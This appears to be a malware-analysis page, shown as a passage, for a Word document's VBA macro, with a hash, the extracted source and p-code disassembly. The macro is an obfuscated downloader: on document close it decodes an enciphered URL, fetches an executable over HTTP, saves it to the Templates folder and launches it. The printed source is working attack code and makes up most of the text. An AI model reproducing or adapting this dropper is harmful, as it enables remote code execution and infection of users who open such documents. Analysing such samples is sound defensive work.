¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨ ' Line #28: ' Ld ¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³ ' MemLd ª¯ª¸¿¿¦¤¢§¸¯¼³¨¦¶¨¦³¹©¢©½¡¼»£®¤«©¶©£¦µ³¯¢½¹¶½¨²¾·¼¥¨º»¡»¾«½°¶·¶¹¨¥¡®¥¦´¶¸³®¥©¼²´¿²µ¼º°¸§§ ' LitDI2 0x00C8 ' Eq ' IfBlock ' Line #29: ' SetStmt ' LitStr 0x000C "adodb.stream" ' ArgsLd ¾©·¬·ª°¿°·´¾µ¬¸¾¬¯¨³»¿¯©µ²«ª¹½§¢¨»¸¸·º²¶º«µ´½¸¹µ¬¶§¨¼µ®»¶¾ªºº³³¬§°¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸² 0x0001 ' Set ¦ªµ½¹¡«ª³«©¡£®¥ºº¥°¸¦¶§¸¬³¬¦©²©µ¥²µ³º«£³³¹¨«¶·¤¡»¿¹£¦¥¦£¬¨¤¶©©°¦¤©¶¨º¹¢¨´¢§°·£¤««µº®´¿³®£´£¥¨³ ' Line #30: ' Ld ¦ªµ½¹¡«ª³«©¡£®¥ºº¥°¸¦¶§¸¬³¬¦©²©µ¥²µ³º«£³³¹¨«¶·¤¡»¿¹£¦¥¦£¬¨¤¶©©°¦¤©¶¨º¹¢¨´¢§°·£¤««µº®´¿³®£´£¥¨³ ' ArgsMemCall Open 0x0000 ' Line #31: ' Ld ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦ ' Ld ¦ªµ½¹¡«ª³«©¡£®¥ºº¥°¸¦¶§¸¬³¬¦©²©µ¥²µ³º«£³³¹¨«¶·¤¡»¿¹£¦¥¦£¬¨¤¶©©°¦¤©¶¨º¹¢¨´¢§°·£¤««µº®´¿³®£´£¥¨³ ' MemSt Type ' Line #32: ' Ld ¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨ ' Ld ¦ªµ½¹¡«ª³«©¡£®¥ºº¥°¸¦¶§¸¬³¬¦©²©µ¥²µ³º«£³³¹¨«¶·¤¡»¿¹£¦¥¦£¬¨¤¶©©°¦¤©¶¨º¹¢¨´¢§°·£¤««µº®´¿³®£´£¥¨³ ' ArgsMemCall Xor 0x0001 ' Line #33: ' Ld ¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿ ' Ld ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦ ' Ld ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦ ' Add ' Ld ¦ªµ½¹¡«ª³«©¡£®¥ºº¥°¸¦¶§¸¬³¬¦©²©µ¥²µ³º«£³³¹¨«¶·¤¡»¿¹£¦¥¦£¬¨¤¶©©°¦¤©¶¨º¹¢¨´¢§°·£¤««µº®´¿³®£´£¥¨³ ' ArgsMemCall i 0x0002 ' Line #34: ' Ld ¦ªµ½¹¡«ª³«©¡£®¥ºº¥°¸¦¶§¸¬³¬¦©²©µ¥²µ³º«£³³¹¨«¶·¤¡»¿¹£¦¥¦£¬¨¤¶©©°¦¤©¶¨º¹¢¨´¢§°·£¤««µº®´¿³®£´£¥¨³ ' ArgsMemCall Close 0x0000 ' Line #35: ' EndIfBlock ' Line #36: ' Ld ¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿ ' Paren ' Ld ¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ ' ArgsMemCall Open 0x0001 ' Line #37: ' EndSub ' Line #38: ' Line #39: ' FuncDefn (Public Function º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ(¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸, id_FFFE As Variant)) ' Line #40: ' LitStr 0x006E " ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãäåØ¶§Ú¥" ' St ·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´« ' Line #41: ' LitStr 0x006E " ¿¡@#$%^&()_+\|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNØ¶QR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY" ' St oSpecialPathnhbjkj ' Line #42: ' StartForVariable ' Ld Document ' EndForVariable ' LitDI2 0x0001 ' Ld ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸ ' FnLen ' For ' Line #43: ' Ld ·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´« ' Ld ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸ ' Ld Document ' LitDI2 0x0001 ' ArgsLd Mid 0x0003 ' FnInStr ' St id_029A ' Line #44: ' Ld id_029A ' LitDI2 0x0000 ' Gt ' IfBlock ' Line #45: ' Ld oSpecialPathnhbjkj ' Ld id_029A ' LitDI2 0x0001 ' ArgsLd Mid 0x0003 ' St id_029C ' Line #46: ' Ld id_029E ' Ld id_029C ' Add ' St id_029E ' Line #47: ' ElseBlock ' Line #48: ' Ld id_029E ' Ld ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸ ' Ld Document ' LitDI2 0x0001 ' ArgsLd Mid 0x0003 ' Add ' St id_029E ' Line #49: ' EndIfBlock ' Line #50: ' StartForVariable ' Next ' Line #51: ' Ld id_029E ' St º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ ' Line #52: ' EndFunc

SHA-256: f4454dabcc7a7807ade4181b862a40ffef8f91ea8108e4941254e32e42446a42

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Dim ¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬ As Integer
¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬ = Chr(50) + Chr(48) + Chr(48)
  Dim WshShell As Object
    Dim oSpecialPathnhbjkj As String

    Set WshShell = CreateObject("WScript.Shell")
    oSpecialPathnhbjkj = WshShell.SpecialFolders("Templates")
Dim «¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°
Dim ¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·
Dim ©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ¸
Dim º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦
Dim ¦ªµ½¹¡«ª³«©¡£®¥ºº¥°¸¦¶§¸¬³¬¦©²©µ¥²µ³º«£³³¹¨«¶·¤¡»¿¹£¦¥¦£¬¨¤¶©©°¦¤©¶¨º¹¢¨´¢§°·£¤««µº®´¿³®£´£¥¨³
Dim ¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨ As Integer
Dim ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º
Dim ¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿
¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨ = 1




Set ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º = CreateObject("microsoft.xmlhttp")
Set ¦ªµ½¹¡«ª³«©¡£®¥ºº¥°¸¦¶§¸¬³¬¦©²©µ¥²µ³º«£³³¹¨«¶·¤¡»¿¹£¦¥¦£¬¨¤¶©©°¦¤©¶¨º¹¢¨´¢§°·£¤««µº®´¿³®£´£¥¨³ = CreateObject("Shell.Application")

º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦ = oSpecialPathnhbjkj + ¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´("\å¶ãKK§Ú.ÂÛÂ")
ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º.Open "get", ¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´("hÖÖÓ://ÓÂÀÁÂzÒÅÂÃlÒw.ÜdÅÕ.ÂÙ/mbÄÅÄgbÀÂÖ/ÕwÒÅdbdb.ÂÛÂ"), False
ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º.send
¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª· = ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º.responseBody
If ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º.Status = 200 Then
Set «¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼° = CreateObject("adodb.stream")
«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°.Open
«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°.Type = ¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨
«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°.Write ¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·
«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°.SaveToFile º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦, ¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨ + ¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨
«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°.Close
End If
¦ªµ½¹¡«ª³«©¡£®¥ºº¥°¸¦¶§¸¬³¬¦©²©µ¥²µ³º«£³³¹¨«¶·¤¡»¿¹£¦¥¦£¬¨¤¶©©°¦¤©¶¨º¹¢¨´¢§°·£¤««µº®´¿³®£´£¥¨³.Open (º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦)
End Sub

    Public Function ¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´(ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦)
        ¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³ = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãäåØ¶§Ú¥"
        ¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹ = " ¿¡@#$%^&*()_+|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNØ¶QR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY"
        For i = 1 To Len(ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦)
            º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ = InStr(¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³, Mid(ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦, i, 1))
            If º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ > 0 Then
                ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸ = Mid(¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹, º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ, 1)
                ·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´« = ·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´« + ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸
            Else
                ·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´« = ·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´« + Mid(ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦, i, 1)
            End If
        Next
        ¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ = ·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«
    End Function

' Processing file: /opt/analyzer/scan_staging/470c3413321b4981a3c364a4b97aef2d.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5084 bytes
' Line #0:
' 	FuncDefn (Private Sub cSpecialPathjhbkvhj())
' Line #1:
' 	Dim 
' 	VarDefn º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦ (As Integer)
' Line #2:
' 	LitDI2 0x0032 
' 	ArgsLd SpecialFolders 0x0001 
' 	LitDI2 0x0030 
' 	ArgsLd SpecialFolders 0x0001 
' 	Add 
' 	LitDI2 0x0030 
' 	ArgsLd SpecialFolders 0x0001 
' 	Add 
' 	St º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦ 
' Line #3:
' 	Dim 
' 	VarDefn ¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸²ª®®®«»·»¢¾¶¿®¬¾¢¿³§©¾¤ª¿§¡««¼´«³º¬¸®¹¼¤«¬¿¥§·«´·µ»½©´µ»¯½°¹ª²½ (As Object)
' Line #4:
' 	Dim 
' 	VarDefn id_02A0 (As String)
' Line #5:
' Line #6:
' 	SetStmt 
' 	LitStr 0x000D "WScript.Shell"
' 	ArgsLd ¾©·¬·ª°¿°·´¾µ¬¸¾¬¯¨³»¿¯©µ²«ª¹½§¢¨»¸¸·º²¶º«µ´½¸¹µ¬¶§¨¼µ®»¶¾ªºº³³¬§°¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸² 0x0001 
' 	Set ¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸²ª®®®«»·»¢¾¶¿®¬¾¢¿³§©¾¤ª¿§¡««¼´«³º¬¸®¹¼¤«¬¿¥§·«´·µ»½©´µ»¯½°¹ª²½ 
' Line #7:
' 	LitStr 0x0009 "Templates"
' 	Ld ¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸²ª®®®«»·»¢¾¶¿®¬¾¢¿³§©¾¤ª¿§¡««¼´«³º¬¸®¹¼¤«¬¿¥§·«´·µ»½©´µ»¯½°¹ª²½ 
' 	ArgsMemLd µ¼º°¸§§¹¾©·¬·ª°¿°·´¾µ¬¸¾¬¯¨³»¿¯©µ²«ª¹½§¢¨»¸¸·º²¶º«µ´½¸¹µ¬¶§¨¼µ®»¶¾ªºº³³¬§°¯£¯¡º®º 0x0001 
' 	St id_02A0 
' Line #8:
' 	Dim 
' 	VarDefn ¦ªµ½¹¡«ª³«©¡£®¥ºº¥°¸¦¶§¸¬³¬¦©²©µ¥²µ³º«£³³¹¨«¶·¤¡»¿¹£¦¥¦£¬¨¤¶©©°¦¤©¶¨º¹¢¨´¢§°·£¤««µº®´¿³®£´£¥¨³
' Line #9:
' 	Dim 
